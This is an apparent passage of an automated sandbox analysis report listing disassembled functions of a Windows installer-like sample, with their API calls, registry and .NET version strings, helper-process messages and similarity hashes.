                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                              • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                                            • , xrefs: 00453E1A
                                                                                            • RegOpenKeyEx, xrefs: 00453E2C
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2812809588-1577016196
                                                                                            • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                            • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                                            • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                            • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                                            APIs
                                                                                              • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                                            Strings
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                                            • v1.1.4322, xrefs: 00458CE2
                                                                                            • .NET Framework version %s not found, xrefs: 00458D29
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                                            • v4.0.30319, xrefs: 00458C11
                                                                                            • v2.0.50727, xrefs: 00458C7B
                                                                                            • .NET Framework not found, xrefs: 00458D3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Open
                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                            • API String ID: 2976201327-446240816
                                                                                            • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                            • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                                            • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                            • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                                            Strings
                                                                                            • Helper isn't responding; killing it., xrefs: 004581A7
                                                                                            • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                                            • Helper process exited., xrefs: 004581E5
                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                            • API String ID: 3355656108-1243109208
                                                                                            • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                            • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                                            • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                            • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                              • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                                            • RegCreateKeyEx, xrefs: 00453ADF
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                                            • , xrefs: 00453ACD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2481121983-1280779767
                                                                                            • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                            • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                                            • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                            • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                                            APIs
                                                                                              • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                              • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                                            • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                              • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                            • 73A15CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                            • API String ID: 170458502-2312673372
                                                                                            • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                            • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                                            • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                            • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                                            • API String ID: 4190037839-37397897
                                                                                            • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                            • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                            • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                            • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 00462124
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                            • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                                            • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                            • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F008
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                            • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                                            • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                            • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                                            • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance$FreeString
                                                                                            • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                                            • API String ID: 308859552-2052886881
                                                                                            • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                            • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                                            • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                            • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02193858,00000000), ref: 00458399
                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                            • API String ID: 2182916169-3012584893
                                                                                            • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                            • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                                            • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                            • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                            • API String ID: 1914119943-2711329623
                                                                                            • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                            • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                                            • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                            • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                                            APIs
                                                                                            • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                            • SaveDC.GDI32(?), ref: 00416E37
                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                            • DeleteObject.GDI32(?), ref: 00416F32
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                            • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                            • String ID:
                                                                                            • API String ID: 375863564-0
                                                                                            • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                            • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                            • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                            • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
